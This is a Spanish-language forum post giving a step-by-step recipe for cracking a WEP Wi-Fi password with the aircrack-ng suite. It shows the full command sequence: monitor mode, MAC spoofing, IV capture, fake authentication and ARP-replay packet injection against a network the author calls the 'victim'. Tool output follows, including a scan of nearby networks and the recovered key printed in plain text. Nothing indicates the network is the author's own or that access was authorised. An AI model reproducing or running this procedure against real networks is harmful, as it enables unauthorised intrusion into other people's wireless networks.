últimos mensajes de: ruben_linux

Este tema esta muuy tratado pero...
Si necesitas generar más trafico, igual que esto.
Este ejercicio esta realizado en un HP dv6 2145es con wifi atheros AR9285 802.11b/g/n
Siguiendo estos pasos no tendremos problemas en descubrir claves, solo es cuestion de tiempo en 2h seguro que la tenemos.
**********************************
sudo airmon-ng start wlan0 --> establece modo monitor el dispositivo wlan0 y lo convierte en mon0
[sudo] password for ruben:

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID   Name
957   avahi-daemon
959   avahi-daemon
960   NetworkManager
1037   wpa_supplicant

Interface   Chipset      Driver

wlan0      Atheros    ath9k - [phy0]
            (monitor mode enabled on mon0)
********************************
sudo ifconfig mon0 down --> tenemos que desactivarlo para poder cambiar la MAC
********************************
sudo macchanger -r mon0 --> cambio de MAC (-r) establece una MAC aleatoria (RANDOM)
Current MAC: 78:e4:00:1c:**:** (unknown)
Faked MAC: 98:ea:6f:be:**:** (unknown)
**********************************
sudo ifconfig mon0 up --> activamos el dispositivo
**************************************
sudo airodump-ng --ivs -w captura_ivs mon0 --> airodump-ng captura las ivs en el archivo captura_ivs
*************************************
sudo aireplay-ng -1 0 -a 00:13:F7:E6:**:** -h 98-EA-6F-BE-**:** -e WLAN636153 mon0 --> estaclecemos una conexion con la victima -a victima -h nos
13:08:47 Waiting for beacon frame (BSSID: 00:13:F7:E6:**.**) on channel 2
13:08:47 Sending Authentication Request (Open System) [ACK]
13:08:47 Authentication successful
13:08:47 Sending Association Request [ACK]
13:08:47 Association successful :-) (AID: 1)
*************************************************
sudo aireplay-ng -3 -b 00:13:F7:E6:**:** -h 98-EA-6F-BE-**:** -x 700 mon0 --> injeccion de paquetes -b victima -h nos -x nÂº de paquetesxsegundo
13:11:14 Waiting for beacon frame (BSSID: 00:13:F7:E6:**:**) on channel 2
Saving ARP requests in replay_arp-0824-131114.cap
You should also start airodump-ng to capture replies.
^Cad 529 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
*************************************************
sudo aireplay-ng -3 -b 00:13:F7:E6:**:** -h 98-EA-6F-BE-**:** -x 700 mon0 --> ya esta injectando, el resultado se guarda en replay_arp-0824-131221.cap
13:12:21 Waiting for beacon frame (BSSID: 00:13:F7:E6:**:**) on channel 2
Saving ARP requests in replay_arp-0824-131221.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
^Cad 239147 packets (got 1 ARP requests and 11492 ACKs), sent 217046 packets...(699 pps)
*********************************
sudo aircrack-ng captura_ivs.ivs
*********************************
Read 40762 packets.

# BSSID ESSID Encryption

1 00:01:38:FA:**:** WLAN_6C Unknown
2 00:01:38:D0:**:** WLAN_F9 WEP (3 IVs)
3 E0:91:53:09:**:** WLAN_56 Unknown
4 00:22:F7:0E:**:** W-Real Unknown
5 00:01:38:D0:**:** WLAN_07 WEP (40331 IVs)
6 00:13:F7:E6:**:** WLAN636153 WEP (370 IVs)
7 00:26:18:10:**:** R-WLAN1C Unknown
8 00:18:9B:3F:**:** Rwlan-11 Unknown
9 00:18:9B:40:**:** MARCOS Unknown
10 00:27:19:E1:**:** busi Unknown
11 00:22:15:1C:**:** R-wlan2 Unknown
12 00:01:38:E4:**:** WLAN_ED Unknown
13 00:26:4D:72:**:** WEP (2 IVs)
14 00:18:9B:05:**:** THOMSON Unknown
15 00:23:4D:92:**:** PS3-5513993 Unknown
16 00:21:27:E4:**:** WIFITP WEP (34 IVs)
17 00:22:3F:07:**:** anaconda Unknown
18 00:01:38:FD:**:** WLAN_40 Unknown
19 E0:91:53:17:**:** WLAN_EC Unknown
20 00:01:38:DF:**:** WLAN_70 Unknown
21 00:1B:2F:F2:**:** NETGEAR Unknown
22 00:22:2D:04:**:** Unknown
23 00:22:6B:95:**:** RB Unknown

Index number of target network ?
*********************************
Aircrack-ng 1.0

[00:00:00] Tested 148530 keys (got 40331 IVs)

KB depth byte(vote)
0 0/ 1 58(53024) D0(47880) C4(47264) 5D(46788) AE(46336) C7(46232) 60(45644) 31(45572) 5B(45556) B4(45356) 9F(45316) CF(45312) 8B(45152)
1 0/ 1 30(48988) 09(47384) 8F(47352) CA(46644) 38(46416) FF(45980) 94(45976) 5F(45772) 41(45592) 43(45576) A5(45476) CC(45472) F8(45436)
2 0/ 1 30(54636) 3C(48456) 7F(47388) 5D(46796) 17(46560) E9(46340) DC(45984) 53(45948) 2F(45880) 46(45716) 2A(45556) E0(45324) A5(45320)
3 0/ 1 30(49616) AF(47544) 7A(47520) 74(46212) 19(46100) 9A(46036) 23(46020) DD(45816) 7E(45756) 8F(45428) 57(45248) 7B(45104) 26(44880)
4 0/ 2 E5(49204) 19(49096) F4(47376) 52(46888) 15(46652) 08(46024) 5C(45900) B2(45396) 5E(44852) 90(44852) 13(44804) DF(44804) E3(44784)
5 0/ 2 33(47576) C6(47480) D5(46860) CE(46752) 06(46344) 49(46276) BC(46248) 00(46240) FA(46196) 4F(46164) 37(45984) 4D(45716) 51(45716)
6 0/ 1 38(48852) A5(46888) 0A(46832) F0(46756) 81(46708) 9D(46500) 6F(46496) 3A(45492) 10(45212) 64(45104) 19(45012) AE(44892) 1D(44848)
7 0/ 1 44(52656) BA(47640) C2(47012) 4D(46612) 62(46460) 3F(45980) 0A(45880) 56(45876) CC(45840) 66(45828) C0(45428) 71(45284) 3D(45212)
8 0/ 1 31(49004) A3(47300) E5(47008) 23(46752) AB(46584) C9(46452) 1E(46356) 03(46224) 09(45796) 31(45628) E7(45428) 75(45372) 6D(45272)
9 0/ 1 43(54100) D9(49584) 65(48548) D3(48292) 8B(48116) 18(47452) 68(46880) 1C(46260) B8(46196) 53(45440) 1B(45152) D0(45140) 01(45024)
10 0/ 1 C7(48844) 79(47452) DF(46748) DE(46372) B2(46348) 0C(46204) 93(46132) 38(46024) C0(46012) 40(45652) 15(45360) 29(45172) 6E(45152)
11 0/ 1 0C(47296) 9F(47220) 9A(47068) 29(46832) FE(46572) 3C(46276) 4E(46012) 7C(45952) 17(45872) EC(45692) 8A(45440) DB(45240) AD(45108)
12 0/ 1 37(56992) 9E(47800) 68(47372) 39(47080) C4(46704) 44(46644) 2E(46428) E0(46280) CA(46088) F8(45956) D2(45628) E5(44768) 4A(44760)

KEY FOUND! [ 58:30:30:30:31:33:38:44:31:43:44:30:37 ] (ASCII: X000138D1CD07 )
   Decrypted correctly: 100%